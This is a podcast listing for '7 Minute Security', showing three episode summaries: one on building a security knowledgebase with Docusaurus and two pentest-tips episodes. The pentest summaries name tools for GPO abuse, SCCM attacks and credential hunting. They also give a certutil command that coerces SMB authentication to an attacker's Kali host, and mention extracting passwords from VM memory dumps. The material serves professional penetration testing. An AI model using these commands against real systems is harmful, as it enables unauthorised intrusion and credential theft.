7 Minute Security  By  cover art

7 Minute Security

By: Brian Johnson
  • Summary

  • 7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.
    Brian Johnson
    Show more Show less
activate_primeday_promo_in_buybox_DT
Episodes
  • 7MS #633: How to Create a Security Knowledgebase with Docusaurus
    Jul 19 2024

    Hey friends, we’re doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus! It’s cool, it’s free, it’s from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin’ in about 5 minutes. Important files include:

    • docusaurus.config.js – for setting the site title and key config settings
    • sidebars.js – used to create/edit navigation bar menus
    • /src/css/custom.css – to style the site
    Show more Show less
    14 mins
  • 7MS #632: Tales of Pentest Pwnage – Part 59
    Jul 12 2024

    Today’s tale of pentest pwnage includes some fun stuff, including:

      • SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder.
      • I’m not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you’re on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under.
      • DonPAPI got an upgrade recently with a focus on evasion!
      • When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you’ve got the vmss2core utility, which I couldn’t find anywhere except the Internet Archive. Then I really like to follow this article to pull passwords from VM memory dumps.
      • Can’t RDP into a victim system that you’re PSRemote’d into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber`

    And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!

    Show more Show less
    48 mins
  • 7MS #631: Tales of Pentest Pwnage – Part 58
    Jul 7 2024

    Hi friends, today’s a tale full of test tips and tools to help you in your adventures in pentesting!

    • SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud’homme – fantastic resource for learning all about attacking SCCM – starting from a perspective of zero creds
    • CMLoot – find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
    • Snaffler – finds all the interesting SMB shares and juicy file contents
    • Efflanrs – takes the raw Snaffler log and turns it into an interactive Web app!
    • RubeusToCcache – a small tool to convert Base64-encoded .kirbi tickets from Rubeus into .ccache files for Impacket
    Show more Show less
    16 mins

What listeners say about 7 Minute Security

Average customer ratings

Reviews - Please select the tabs below to change the source of reviews.